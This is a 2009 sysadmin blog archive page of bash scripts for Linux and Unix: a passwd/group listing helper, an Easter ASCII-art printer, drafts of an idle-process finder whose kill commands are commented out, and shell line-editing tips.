Showing posts with label bash. Show all posts
Showing posts with label bash. Show all posts

Tuesday, April 21, 2009

Simple Script To List Groups In Passwd File Output On Linux And Unix

Hey There,

Today's simple, but somewhat useful, little Bash Script is brought to you by "The Human Fund: Money For People" ;) That was shamelessly lifted from "Seinfeld," but I always liked that fake name better than UNICEF ;)

Basically, todays Bash script manipulates the output of a simple "cat" of the /etc/passwd file and interpolates primary and secondary group values, for each user, into their respective output lines. It should run equally well on virtually any Linux or Unix distro since the passwd fields are in the same order on almost all of them and it doesn't make use of any of the group file fields past the fourth (so extended group files shouldn't affect this).

NOTE: This script goes well with this bash one liner to generate somewhat fancy w output. Haven't had your fill of pap for the day? Check that out ;)

The output you'll get from the script is similar to a simple "cat" of the /etc/password file (senility awareness kicking in - I just mentioned that ;), except that the fourth field will be modified. When you run this script, you'll notice that the fourth field of colon-delimited output includes alpha dash (-) delimited output of the form: pg=XXXX-sg=XXXX, rather than just the standard numeric Primary Group ID. The "pg" stands for Primary Group and the "sg" stands for Secondary Group. The Secondary Group, it should be noted, may contain more than one entry (split by commas), if the user belongs to more than one secondary group, and will print "NONE" if the user ID being listed doesn't belong to any groups other than its primary.

The script's simple to to run (because it doesn't have any fancy options ;) and should work fairly quickly (although, like everything, it could probably be more efficient. Once I fully develop my insect-like ability to differentiate microseconds, this sort of thing will bother me much more ;).

To run it, simply run it, like so, and you'll get your output (This is from a stripped Solaris box with only one user account and several useless standard accounts removed):

host # ./pwgroups
root:x:0:pg=root-sg=root,other,bin,sys,adm,uucp,mail,tty,lp,nuucp,daemon:Super-User:/:/sbin/sh
daemon:x:1:pg=other-sg=bin,adm,daemon::/:
bin:x:2:pg=bin-sg=bin,sys::/usr/bin:
sys:x:3:pg=sys-sg=sys::/:
adm:x:4:pg=adm-sg=sys,adm,tty,lp:Admin:/var/adm:
lp:x:71:pg=lp-sg=lp:Line Printer Admin:/usr/spool/lp:
uucp:x:5:pg=uucp-sg=uucp:uucp Admin:/usr/lib/uucp:
nuucp:x:9:pg=nuucp-sg=nuucp:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:pg=smmsp-sg=smmsp:SendMail Message Submission Program:/:
listen:x:37:pg=adm-sg=NONE:Network Admin:/usr/net/nls:
webservd:x:80:pg=webservd-sg=webservd:WebServer Reserved UID:/:
postgres:x:90:pg=postgres-sg=postgres:PostgreSQL Reserved UID:/:/usr/bin/pfksh
nobody:x:60001:pg=nobody-sg=nobody:NFS Anonymous Access User:/:
noaccess:x:60002:pg=noaccess-sg=noaccess:No Access User:/:
nobody4:x:65534:pg=nogroup-sg=NONE:SunOS 4.x NFS Anonymous Access User:/:
user1:x:37527:pg=unixteam-sg=guys,folks:Captain Beefmeat:/export/home/user1:/bin/bash


Sure, this script won't save lives (or even change any ;) but I have found use for it from time to time. ...Which stands to reason, I suppose. If I don't think I'm ever going to do something again, I almost never script it out ;)

Hope you find it useful or, at least, mildly amusing :)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# pwgroups - add alpha primary and secondary group information to /etc/passwd output
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

export IFS=":"
while read one two three four five six seven
do
pri=$(grep -w ${four} /etc/group|awk -F":" '{print $1}')
sec=$(echo `grep -w ${one} /etc/group|awk -F":" '{print $1}'`|xargs echo|sed 's/ /,/g')
if [[ ${#sec} -eq 0 ]]
then
sec=NONE
fi
echo "${one}:${two}:${three}:pg=${pri}-sg=${sec}:${five}:${six}:${seven}"
done </etc/passwd



, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Sunday, April 12, 2009

An Easter Story: More ASCII Art For Linux And Unix

Hey There,

It's yet another holiday that we haven't ASCII'ed yet, and we've got another script to print a somewhat-tame Easter story, and picture, to your terminal. Yet again, I've gone back to Joan Stark's ASCII Art Gallery to find a really good picture. And I don't just pick her site because it comes up as Google search result number one for every query I run; there actually is an enormous quantity of high quality ASCII art there. Check it out if you still haven't.

If you're interested in any of our other ASCII art holiday script postings, just check out this page, which is a general search for ASCII Art on our site and you're sure to find most of them there.

If the pictorial representation of the script output below isn't large enough, click on it once to be smacked in the face with the HUMONGOUS version ;)

easter ASCII art

For this installment, I've attached two scripts to the post. The first one is the straight-up bash script. The second is the same script, except with all the spaces padded with "X"'s. If you're having problem maintaining the spaces when you copy/paste the original script, just copy/paste the padded one and then (in vi, or whatever your favorite editor is) substitute "X" with a space character for all occurrences. In vi, that would be an "ex" command like:

[esc]:g/X/s// /g

or

[esc]:%s// /g

Enjoy and Happy Easter :)


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License



REGULAR

#!/bin/bash

#
# easter.sh
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

echo -en "...THE FIRST EASTER BUNNY... by Francine M. O'Connor\n (ASCII Art by joan stark)\n\n __ /^\\\\\n .' \ / :.\ This is the story of a long-eared rabbit\n / \ | :: \ who couldn't learn to do the bunny hop.\n / /. \ / ::: | His ears were floppy, his feet were sloppy,\n | |::. \ / :::'/ he'd hippity hop, then he'd trip and plop.\n | / \::. | / :::'/\n \`--\` \' \`~~~ ':'/\`\n / ( So this little rabbit developed the habit\n / 0 _ 0 \ of staying awake when the sun went down.\n \/ \_/ \/ He'd stay up all night, \n -== '.' | '.' ==- till the morning light, and \n /\ '-^-' /\ practice his hopping just outside of town.\n \ _ _ / \n .-\`-((\o/))-\`-. \n _ / //^\\ \ _ On the first Easter morn, \n.\"o\".( , .:::. , ).\"o\". just before dawn,\n|o o\\\\\ \:::::/ //o o| He was startled by a bright\n \ \\\\\ |:::::| // / and blinding light.\n \ \\\\\__/:::::\__// / And Jesus was there in the \n \ .:.\ \`':::'\` /.:. / shimmering glare,\n \':: |_ _| ::'/ smiling at that funny bunny's plight.\n jgs \`---\` \`\"\"\"\"\"\` \`---\`\n \n Don't worry, little lad, and don't be so sad, .-\"-.\n for humankind will celebrate this special day. .'=^=^='.\n You must bring the word to every beast and bird /=^=^=^=^=\\\\\n that I have risen and am in the world to stay. :^= HAPPY =^;\n |^ EASTER! ^|\n You should've seen that cottontail hop away, :^=^=^=^=^=^:\n feeling mighty proud to be the chosen one. \=^=^=^=^=/\n Though this story is quite old, it can now be retold \`.=^=^=.'\n to make little children smile on Easter morn. \`~~~\`\n"



PADDED
#!/bin/bash

#
# easter.padded.sh
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

echo -en "...THEXFIRSTXEASTERXBUNNY...XbyXFrancineXM.XO'Connor\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX(ASCIIXArtXbyXjoanXstark)\n\nXXXXXX__XXXXXXXXXXXX/^\\\\\nXXXX.'XX\XXXXXXXXXX/X:.\XXXXXXXThisXisXtheXstoryXofXaXlong-earedXrabbit\nXXX/XXXXX\XXXXXXXXX|X::X\XXXXXXwhoXcouldn'tXlearnXtoXdoXtheXbunnyXhop.\nXX/XXX/.XX\XXXXXXX/X:::X|XXXXXXHisXearsXwereXfloppy,XhisXfeetXwereXsloppy,\nX|XXXX|::.X\XXXXX/X:::'/XXXXXXXhe'dXhippityXhop,XthenXhe'dXtripXandXplop.\nX|XXX/X\::.X|XXX/X:::'/\nX\`--\`XXX\'XX\`~~~X':'/\`\nXXXXXXXXX/XXXXXXXXX(XXXXXXXXXXXSoXthisXlittleXrabbitXdevelopedXtheXhabit\nXXXXXXXX/XXX0X_X0XXX\XXXXXXXXXXofXstayingXawakeXwhenXtheXsunXwentXdown.\nXXXXXX\/XXXXX\_/XXXXX\/XXXXXXXXHe'dXstayXupXallXnight,X\nXXXX-==X'.'XXX|XXX'.'X==-XXXXXXXXXtillXtheXmorningXlight,XandX\nXXXXXX/\XXXX'-^-'XXXX/\XXXXXXXXpracticeXhisXhoppingXjustXoutsideXofXtown.\nXXXXXXXX\XXX_XXX_XXX/XXXXXXXXXXXXX\nXXXXXXX.-\`-((\o/))-\`-.XXX\nXX_XXX/XXXXX//^\\XXXXXX\XXX_XXXXOnXtheXfirstXEasterXmorn,X\n.\"o\".(XXXX,X.:::.X,XXXX).\"o\".XXXXXjustXbeforeXdawn,\n|oXXo\\\\\XXXX\:::::/XXXX//oXXo|XXHeXwasXstartledXbyXaXbright\nX\XXXX\\\\\XXX|:::::|XXX//XXXX/XXXXXXandXblindingXlight.\nXX\XXXX\\\\\__/:::::\__//XXXX/XXXXAndXJesusXwasXthereXinXtheX\nXXX\X.:.\XX\`':::'\`XX/.:.X/XXXXXXXXshimmeringXglare,\nXXXX\'::X|_XXXXXXX_|X::'/XXXXXXsmilingXatXthatXfunnyXbunny'sXplight.\nXjgsX\`---\`X\`\"\"\"\"\"\`X\`---\`\nXXXXXXXXXXXXXXXXXXXXXXXXXX\nXXXXDon'tXworry,XlittleXlad,XandXdon'tXbeXsoXsad,XXXXXXXXXXX.-\"-.\nXXXXforXhumankindXwillXcelebrateXthisXspecialXday.XXXXXXXX.'=^=^='.\nXXXXYouXmustXbringXtheXwordXtoXeveryXbeastXandXbirdXXXXXX/=^=^=^=^=\\\\\nXXXXthatXIXhaveXrisenXandXamXinXtheXworldXtoXstay.XXXXXX:^=XHAPPYX=^;\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|^XEASTER!X^|\nXXXXYouXshould'veXseenXthatXcottontailXhopXaway,XXXXXXXX:^=^=^=^=^=^:\nXXXXfeelingXmightyXproudXtoXbeXtheXchosenXone.XXXXXXXXXXX\=^=^=^=^=/\nXXXXThoughXthisXstoryXisXquiteXold,XitXcanXnowXbeXretoldXX\`.=^=^=.'\nXXXXtoXmakeXlittleXchildrenXsmileXonXEasterXmorn.XXXXXXXXXXX\`~~~\`\n"




, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Monday, March 30, 2009

Idle Process Time On Linux And Unix: How To Find It Again

Hey There,

In our final installment on "finding a process's idle time on Linux or Unix," (last touched upon in our post on echo debugging) we looked at whole lot of ways one could go wrong trying to find the idle time of a process on Linux or Unix. This post is a little more upbeat ;)

All of the previous issues with "who -T" have been worked out. Basically, this means that I've gone over it every which way and could find no good reason to use it, as opposed to "w." Of course, in our particular case, we are looking, specifically, for a single process's idle time (as opposed to a user process's idle time; reported by "who -T"). And, although it's a little bit of a pain (initially), short of programming in C (accessing the pstatus struct on Solaris, to be exact - the name and location may vary from distro to distro of proprietary, or free, Unix and/or Linux), linking the pty information from ps with the "idle time" information from w, seems to be the best way to get this information. So far, it's the most efficient way I could find using simple bash scripting.

Attached to today's post is the final "blog" version of this script. It comes with a few notes (possibly of caution) and may need to be modified for your system/OS (There's the first one ;)

The script runs very simply, and you only need to supply it with a PID. You can, optionally, supply a username as a second argument:

host # ./rip 17787

if you just run it with no arguments, you'll get a usage screen, which may or may not help ;)

host # ./rip
Usage: ./rip PID [user]
User defaults to the value
of $LOGNAME if not specified


Please see our previous post on echo debugging this script for more detailed sample output.

I hope you find some good use for this script, and, without further ado, the oft-dreaded notations of explanation ;)

1. This script has been rewritten to be self-contained. Please see the bottom line for any substitute command you may want to use. Actually, making this command a variable might be a good idea. Just call me "Lazy" ;)

2. You can remove the explicit PATH definition if you like. I put it in there specifically to make sure that the "which ps" variable assignment didn't accidentally grab /usr/ucb/ps on Solaris

3. You can comment out the SIGNAL variable as well, since plain old kill is a sig TERM or 15. The only real reason to set this would be if you wanted to always run kill with a different signal (like SIGKILL,, or 9, for example)

4. I changed the minimum idle time to 30 minutes from 45 (in the previous revisions)

5. All variables appearing in this work are fictitious. Any resemblance to real variables, living or dead, is purely coincidental ;)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# rip - Kill any processes that we know have been idle for more than 30 minutes
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

PATH="/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin"
procowner="rftprocowner"
prog="\./rft"
sed=`which sed`
awk=`which awk`
ps=`which ps`
grep=`which grep`
kill=`which kill`
signal="-15"

while read a b c d
do
pid=$b
pid_not_var=$(echo $pid | $grep [A-z])

if [[ ! -z $pid_not_var ]]
then
echo "pid $1 contains non-numeric characters!"
continue
fi

pid="$b"
pid_pty="$c"

if [[ -z "$pid_pty" ]]
then
echo "pid $pid is either non-existent, not owned by \"$procowner\" or not attached to a p/tty!"
continue
elif [[ "$pid_pty" = "?" || "$pid_pty" = "console" ]]
then
echo "pid $pid is not attached to a pty!" # kill OR LEAVE IT?
else
pty_num=$(echo "$pid_pty"|$sed 's/^[^\/]*\///')
fi

proc_time=$(w -sh $procowner|grep $pty_num|grep -v grep|$awk '{if ( $2 == '"$pty_num"' && NF == 4 ) print $3;else if ( $2 == '"$pty_num"' && NF == 3) print "0"}')

proc_is_num=$(echo $proc_time | $grep [A-z])
if [[ ! -z $proc_is_num ]]
then
unset proc_time
fi

ext_proc_time=$(echo $proc_is_num | $grep [A-z])

if [[ ! -z "$ext_proc_time" && -z "$proc_time" ]]
then
echo "killing $pid - $d Up Over 24 Hours: $ext_proc_time $proc_time"
### $kill $signal $pid
elif [[ "$proc_time" = "0" ]]
then
:
else
proc_idle_time=$(echo $proc_time|$grep -v "[:]")
if [[ -z $proc_idle_time || $proc_idle_time -gt 30 ]]
then
echo "killing $pid - $d Up More Than 30 Minutes: $ext_proc_time $proc_time $proc_idle_time"
### $kill $signal $pid
fi
fi
done <<< "`$ps -fu $procowner -o procowner,pid,tty,comm|$grep "$prog"|$grep -v grep`"


, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Thursday, March 26, 2009

Simple, But Effective. Echo Debugging On Linux And Unix

Hey there,

I took some time and did some simple "echo debugging" and found that the warning I issued about yesterday's script to find a process's idle time was completely backward. Fortunately, it turns out that my mistaken judgement meant that I had a lot less to worry about, in terms of damage control, from the flaw I perceived in my script (I'm not saying there aren't others, of course ;)

It turns out that the problem was not that the script would sometimes consider an active process, that didn't have an idle column value in the "w -s" output, to be idle and worth terminating. The actual problem was that it would consider processes that had been up for more than a day to be active and not worth terminating. This was a much better situation. At least I wouldn't be killing off active processes!

A sample of just using the DEBUG statements I put in yesterday's script pointed out the error very obviously, like so:

DEBUG::::: PIDTTY 6892 pts/119
DEBUG::::: W user1 119 2days ./program
DEBUG::::: LONGTIME TIME
PID 6892 is OK - Not Idle At All - Remove this message!
------------------------
DEBUG::::: PIDTTY 581 pts/232
DEBUG::::: W user1 232 2days ./program
DEBUG::::: LONGTIME TIME
PID 581 is OK - Not Idle At All - Remove this message!
-----------------------------------


And, yes, I felt like a complete moron when I finally took a second to actually look at the output ;) It's a amazing what a few simple echo statements in a script can tell about what problem's it has :)

From that point, I found several other issues and worked on them accordingly:

1. ISSUE WITH IDLE ALPHA DAYS NOTATION = FIX BY CHECKING FOR NON-NUMERIC TYPES

2. ISSUE WITH NO-IDLE MISSING COLUMN = FIX BY SETTING EMPTY VALUE TO NULL PADDED

3. ISSUE WITH MISSING COLUMN ERROR OUTPUT = FIX BY CHECKING COLUMN COUNT IN TIME

4. MUCH BETTER - "NOT IDLE AT ALL" EXCEPTION NEVER CAUGHT - UNNECESSARY NOW - REMOVED

5. REWORKED TIME HANDLING AND SET TO AMBIGUOUS ALPHA MATCH


Pardon my hysterical notes ;) Most of my problem stemmed from the fact that I switched from full-fledged "w" to "w -s" and made some mistakes in updating the relevant columns that I needed to assign to variables.

I should note that I also considered using "who -T" to get around the one time-stealer in this script. Although it did bring the script down to under a second (processing approximately 100 records), "who" only reports on the "user process." This is a huge consideration, since the "user process" can (and usually is) the parent process of the process you want to check the idle time on. I ultimately decided to stick with "w" since using "who" would mean I'd have to check the parent process, cross reference that with the grep output associated with the pty and then end up back at "w" again to get the process's idle time. A lot of extra work for a lot of extra uncertainty. I didn't want to end up in a situation where the "user process" was idle because the user kicked off a script that ran for 6 hours and then terminate the user's main process (which would kill the kids) based on the idle time of the user's session. Sometimes, lack of precision like that can cause you headaches you never imagined you could have ;)

As you can see below, the updates weren't all that impressive, but I did get the execution time down to 30 seconds from 2 minutes. The only way I could get it lower (that I've figure out so far ;) was to compromise the integrity of the script and remove the one awk statement that was holding it back. Notice the last step I took, just to see what would happen, that proved the awk if/else conditional in the script was responsible for a majority of the execution time:

TRIMMED CODE - REMOVED DEBUG AND UNNECESSARY ECHO STATEMENTS - USING BASH TEST AND OPERATORS
OLD SCRIPT EXECUTION TIME FOR 178 PROCS = 1m27.430s
NEW SCRIPT EXECUTION TIME FOR 179 PROCS = 0m56.517s
NEW SCRIPT EXECUTION TIME FOR 110 PROCS = 0m48.940s
SELF-CONTAINED SCRIPT EXECUTION TIME FOR 111 PROCS = 0m51.048s
ADDED TTY TO PS SCRIPT EXECUTION TIME FOR 101 PROCS = 0m29.703s
REMOVING AWK TTY STATEMENT SCRIPT EXECUTION TIME FOR 100 PROCS = 0m29.991s
ADDED ?, console and "continue" SCRIPT EXECUTION TIME FOR 102 PROCS = 0m33.018s
REMOVED W HEADING (REM SED) AND EXPLICIT USER SCRIPT EXECUTION TIME FOR 101 PROCS = 0m33.382s
TEST - HARDCODED UPTIME AND REMOVED AWK STATEMENT - SCRIPT EXECUTION TIME FOR 170 PROCS = 0m8.512s!!!!!!!!!!!


I'm going to work on it some more, because I believe it can be improved tremendously, but - to satisfy any curiosity, here's some of the mid-work that fixed that issue and made the bash script report correctly. I'll post the one with the fixes noted above (and more, I'm sure ;) once I've thoroughly tested them and removed a lot of the redundancy in this script. Redundancy really gets under my skin. I mean it; redundancy really irritates me. Plus, I don't much care for redundancy ;)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# rip - Kill any processes that we know have been idle for more than 45 minutes - v2-alpha
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [[ $# -lt 1 ]]
then
echo "Usage: $0 PID [user]"
echo "User defaults to the value"
echo "of \$LOGNAME if not specified"
exit 1
fi

PID=$1
ISITAPID=$(echo $PID | grep [A-z])

if [[ ! -z $ISITAPID ]]
then
echo "PID $1 contains non-numeric characters!"
echo "-----------------------------------"
exit 2
fi

PID="$1"
USER=${2:-$LOGNAME}

PIDTTY=$(/usr/bin/ps -fu $USER -o pid,tty |/usr/bin/grep -w $PID|/usr/bin/grep -v grep)

echo DEBUG::::: PIDTTY $PIDTTY

if [[ -z "$PIDTTY" ]]
then
echo "PID $PID is either non-existent, not owned by \"$USER\" or not attached to a p/tty!"
echo "-----------------------------------"
exit 3
else
TTYNUMBER=$(echo "$PIDTTY"|/usr/bin/sed '/TT/d'|/usr/bin/awk -F"/" '{print $2}')
fi

if [[ -z "$TTYNUMBER" ]]
then
echo "PID $PID is not attached to a p/tty!"
echo "KILL OR NOT-----------------------------------"
exit 4
fi

echo DEBUG::::: W $(w -s|/usr/bin/sed 1d|/usr/bin//awk '{if ( $2 == '"$TTYNUMBER"' ) print $0}')

TIME=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( $2 == '"$TTYNUMBER"' && NF == 4 ) print $3;else if ( $2 == '"$TTYNUMBER"' && NF == 3) print "0"}')
#TIME=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( $2 == '"$TTYNUMBER"' ) print $3}')
#WCOLUMNS=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( NF == 4 ) print "4";else print "3"}')

ISITANUMBER=$(echo $TIME | grep [A-z])
if [[ ! -z $ISITANUMBER ]]
then
unset TIME
fi

LONGTIME=$(echo $ISITANUMBER | grep [A-z])

echo DEBUG::::: LONGTIME $LONGTIME TIME $TIME

if [[ ! -z "$LONGTIME" && -z "$TIME" ]]
then
echo "PID $PID is ancient - Idle for $LONGTIME... Killing $PID"
# KILLKILLKILL
elif [[ "$TIME" = "0" ]]
then
echo "PID $PID is OK - Not Idle At All - Remove this message!"
else
TIMEIDLE=$(echo $TIME|grep -v "[:]")
echo DEBUG::::: TIME $TIME
if [[ -z $TIMEIDLE ]]
then
echo "PID $PID has been idle way too long - $LONGTIME $TIME so far... Killing $PID"
# KILLKILLKILL
elif [[ $TIMEIDLE -gt 45 ]]
then
echo "PID $PID has been idle too long - $TIMEIDLE minutes so far... Killing $PID"
# KILLKILLKILL
else
echo "PID $PID is OK - Only idle for $TIME minute(s) - Remove this message!"
fi
fi
echo "-----------------------------------"


, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Wednesday, March 25, 2009

Finding A Process's Idle Time On Linux And Unix

Hey There,

Hopefully yesterday's rant on the simplicity of complexity wasn't too much of a bitter pill. If it was, here's hoping you didn't swallow it ;)

Today, I finally found some time to make a little headway on this project (which should be a lot simpler than it is). Basically, what I'm looking to do is create a way to track specific process's idle times at any given point in time on any given Linux or Unix system. As I mentioned yesterday, there are c structures in Solaris' /proc/PID/status C data files (for one example), but that's just another thing that ended up frustrating me more. As I noted, parts of the OS that are included, should be available for use. The structure is used by the OS, in some shape or fashion, to determine idle times (as we'll see below), but no specific "tool" exists to do what i wanted. Of course, this is limited "to my knowledge." If anyone out there knows of a standard program or command that's managed to elude me, please feel free to email me and tell me all about. I promise to not get offended if you feel the need to belittle me for not having the common sense to look for it where it was at in the first place ;)

Attached to today's post is a rough-draft bash script that attempts to grab a process's idle time. It won't work in all instances, although I've tried to capture as many of those instances as possible. The one big gotcha in this whole mess is that you can't take the output of ps and directly retrieve the idle time for a process from the listing, even if you do your own formatting (I wrote this on Solaris 10 and looked at SUSE Linux 9, but found no love :) Instead, I found that I needed to run ps, extract the pty associated with the process from that (if it existed - which is an exception the script catches) and then use either who or w to retrieve the idle time associate with the pty.

See what I mean? Shouldn't it be a little bit less of a hassle than that?

Okay. I'll admit, if it was, I wouldn't be having half the fun I'm having now trying to script it all out for myself ;) So far, what I've put together works fairly well, although I'm not 100% certain that it's bullet-proof so I would recommend that you leave the "business end" of the code commented out (The stuff that performs unforgivable actions, like killing ;). I have a hard time reproducing it, but I can swear that this code will (every once in a good while) determine that a process that hasn't been idle at all (which removes a column from the "w -s" output) has been idle too long. I'm still working on that part and welcome any suggestions regarding the script, how to make it better, why I'm doing everything the wrong (and/or hard) way when I don't need to and any other constructive criticism :)

The script runs very simply, and you only need to supply it with a PID. You can, optionally supply a username as a second argument:

host # ./rip 17787

if you just run it with no arguments, you'll get a usage screen, which may or may not help ;)

host # ./rip
Usage: ./rip PID [user]
User defaults to the value
of $LOGNAME if not specified


and the following is a sample of the output you might get on a specific run. Here, I've written a command line while loop from a pipe to barbarically hammer out multiple instances at a time ;)

host # time ps -ef|grep "[b]ash"|awk '{print $2}'|while read x;do ./rip $x;done
PID 2664 is not attached to a p/tty!
-----------------------------------
PID 10700 is either non-existent, not owned by "root" or not attached to a p/tty!
-----------------------------------
PID 10855 is OK - Not Idle At All - Remove this message!
-----------------------------------
PID 23217 is OK - Not Idle At All - Remove this message!
-----------------------------------
PID 14730 is either non-existent, not owned by "root" or not attached to a p/tty!
-----------------------------------


Here's another example. This time you'll see what you get if you try to run the script specifying a user other than the user that owns the processes or, in this case, a completely bogus user. This "test" in the script really isn't necessary and I only included it as feeble attempt at damage control. Feel free to remove it if you like:

host # time ps -ef|grep "[b]ash"|awk '{print $2}'|while read x;do ./rip $x joeUser;done
ps: unknown user joeUser
PID 2664 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 23633 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 10700 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 10855 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 14730 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------


I hope you find some good use for this script!

NOTE: Please keep in mind the caveat noted above regarding the sometimes-false-positive I believe this script returns under certain circumstances when it decides a non-idle process (with nothing displayed in the idle column from "w -s" output) has been idle too long! It may never happen again and I may have been seeing spots. Just want to keep you in a "safe" mindset, just in case I'm not completely insane ;)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# rip - Kill any processes that we know have been idle for more than 45 minutes
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -lt 1 ]
then
echo "Usage: $0 PID [user]"
echo "User defaults to the value"
echo "of \$LOGNAME if not specified"
exit 1
fi

PID=$1
ISITAPID=$(echo $PID | grep [A-z])

if [ ! -z $ISITAPID ]
then
echo "PID $1 contains non-numeric characters!"
echo "-----------------------------------"
exit 2
fi

PID="$1"
USER=${2:-$LOGNAME}

PIDTTY=$(/usr/bin/ps -fu $USER -o pid,tty |/usr/bin/grep -w $PID|/usr/bin/grep -v grep)

#echo DEBUG::::: PIDTTY $PIDTTY

if [ -z "$PIDTTY" ]
then
echo "PID $PID is either non-existent, not owned by \"$USER\" or not attached to a p/tty!"
echo "-----------------------------------"
exit 3
else
TTYNUMBER=$(echo "$PIDTTY"|/usr/bin/sed '/TT/d'|/usr/bin/awk -F"/" '{print $2}')
fi

if [ -z "$TTYNUMBER" ]
then
echo "PID $PID is not attached to a p/tty!"
echo "-----------------------------------"
exit 4
fi

#echo DEBUG::::: W $(w -s|/usr/bin/sed 1d|/usr/bin//awk '{if ( $2 == '"$TTYNUMBER"' ) print $0}')

TIME=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( $2 == '"$TTYNUMBER"' ) print $3}')

ISITANUMBER=$(echo $TIME | grep [A-z])
if [ ! -z $ISITANUMBER ]
then
unset TIME
fi

LONGTIME=$(echo $TIME | grep [A-z])

#echo DEBUG::::: LONGTIME $LONGTIME TIME $TIME

if [ -z "$LONGTIME" -a -z "$TIME" ]
then
echo "PID $PID is OK - Not Idle At All $TIME - Remove this message!"
elif [ ! -z $LONGTIME ]
then
echo "PID $PID is ancient - Idle for $TIME... Killing $PID"
# DO_WHAT_YOU_HAVE_TO_DO_TO_THE_PID_HERE
else
TIMEIDLE=$(echo $TIME|grep -v "[:]")
# echo DEBUG::::: TIME $TIME
if [ -z $TIMEIDLE ]
then
echo "PID $PID has been idle way too long - $LONGTIME $TIME so far... Killing $PID"
# DO_WHAT_YOU_HAVE_TO_DO_TO_THE_PID_HERE
elif [ $TIMEIDLE -gt 45 ]
then
echo "PID $PID has been idle too long - $TIMEIDLE minutes so far... Killing $PID"
# DO_WHAT_YOU_HAVE_TO_DO_TO_THE_PID_HERE
else
echo "PID $PID is OK - Only idle for $TIME minute(s) - Remove this message!"
fi
fi
echo "-----------------------------------"


, Mike




Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!



Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Wednesday, February 18, 2009

Simple Unix And Linux Shell Tricks To Save You A Few Gray Hairs

What it is?

Tomorrow, we're going to complete the the experiment we started in Monday's post on absorption of knowledge in the computer age, so, for today, we're just going to focus on a few little tricks that can save you grief, heartache, strife, worry and all those bad feelings people have to take prescription medication to deal with nowadays ;) Not to belittle chronic anxiety/depression (both symptoms treated with the same drugs) but, as fun as they may be, pharmaceuticals rarely actually solve a "mood disorder." And we use that term lightly. When we were kids, we were either happy, sad, pissed off or excited; any number of emotions that required no medication to correct. None of the kids in the neighborhood had ED, ADD, ADHD, LD's, or OCD's - They were all fussy, uninterested, spastic, stupid and had OCD's ;) Nowadays, too many kids have disorders and the meaning of the word has been devalued. We, here, all have CD's. We listen to them when we want to hear music. We will, of course, be asking our respective physicians about ways in which chemically altering ourselves can help us lose our CD's, and (hopefully) not feel compelled to buy new ones.. ;)

Sorry - no offense. We realize it's too late, but, if you have ADD, ADHD or any disorder of that nature, you'll get over this soon enough. Now, what the Hell was this post about, again? ;)

Oh yeah. A few little shell tricks to make your life easier so you can quit popping pills and jump-start the U.S. economy by drinking more :)

1. How to save yourself from having to retype a huge line that you thought you wanted to type, but, about at the end, you realized you couldn't enter until you typed a line preceding it, and you couldn't even tag that line to the beginning of the line you were already typing so you end up hitting ctl-C and typing the whole thing over again :

host # for x in a b c d e f g h i j k l m n o p q r s t u v w x y z ;do ps -ef|grep "[h]orse"|awk '{print $2}'|xargs ptree;don ^C


Rather than stand for that, just do the following thing whenever you log into your shell. Always make sure that you have line editing enabled. In bash, ksh, etc, if you want to enable vi line editing, all you need to do is type:

host # set -o vi

on the command line or, better yet, at it to your .bash_profile, .profile or .bashrc, so line editing will get set every time you log in and you won't have to always remember to do it. If you like emacs, just replace vi in the example above. This way, once you get to the end of that long line, you can type (literally)

[esc]0i#[enter]

That's the escape key (to get into vi command mode), the number 0 (to whisk you back to the beginning of the line), the letter i (to get you out of vi command mode and into insert mode) and the pound (#) symbol (to make the whole line a comment) and then the enter key. This will cause your line to become a comment, just like in a shell script and the shell won't execute it. Then you can type your preceding line and (assuming vi again) type:

[esc]kkx[enter]

